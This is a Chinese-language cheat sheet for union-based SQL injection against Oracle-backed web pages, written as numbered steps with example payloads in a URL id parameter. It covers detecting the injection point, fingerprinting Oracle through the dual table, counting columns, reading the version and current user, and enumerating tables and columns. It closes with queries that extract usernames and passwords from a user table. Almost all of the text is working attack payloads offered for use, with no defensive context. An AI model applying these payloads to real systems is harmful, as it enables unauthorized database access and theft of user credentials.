1、首先判断是否存在注入点 and 1=1/and 1=2
2、然后在判断是什么类型数据库and (select count () from dual)>0**
Ps:Dual为oracle的一个默认表
eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库
3、判断列数order by 看页面是否正常显示
4、联合注入, union select null,null from dual
然后改变null为字符型,如‘null’,判断显示位
5、根据显示位,查看数据库版本信息及当前数据库
eg:?id=-1 union select ‘null’, (select banner from sys.v_$version where rownum=1) from dual
eg:?id=-1 union select ‘null’, (SELECT name FROM v$database) from dual
6、查看当前用户
eg:?id=-1 union select ‘null’, (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual) from dual
7、直接跑所有表
eg:?id=-1 union select ‘null’, TABLE_NAME from USER_TABLES
eg:?id=-1 union select ‘null’,(select table_name from user_tables where rownum=1) from dual
eg:?id=-1 union select ‘null’,(select table_name from user_tables where rownum=1 and table_name like ‘%user%’) from dual
等价于union select ‘null’,(select table_name from user_tables where table_name like ‘%user%’) from dual
8、跑表字段
union select null,COLUMN_NAME from user_tab_columns/all_tab_columns where TABLE_NAME=‘具体表名’
eg:?id=-1 union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’) from dual
等价于
union select ‘null’,(select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’) from dual
union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)) from dual
union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’) and column_name not in (‘USER_PWD’) ) from dual
9跑数据
union select ‘null’, 字段1||’=’||字段2,null from 具体表名
eg:?id=-1 union select user_name,user_pwd from "sns_users"
eg:union select user_name,user_pwd from “sns_users” where user_name<>‘hu’
- 连接多个字段用到的连接符号是||,在oracle数据库中,concat函数只能连接两个字符串.union select 1,字段1||字段2…||字段n from 表名
eg:?id=-1 union select user_name||’=’||user_pwd,‘null’ from “sns_users” where user_name not in(‘hu’)
union select user_name||user_pwd,‘null’ from “sns_users” where user_name not in(‘hu’)
union select ‘null’,user_name||user_pwd from “sns_users”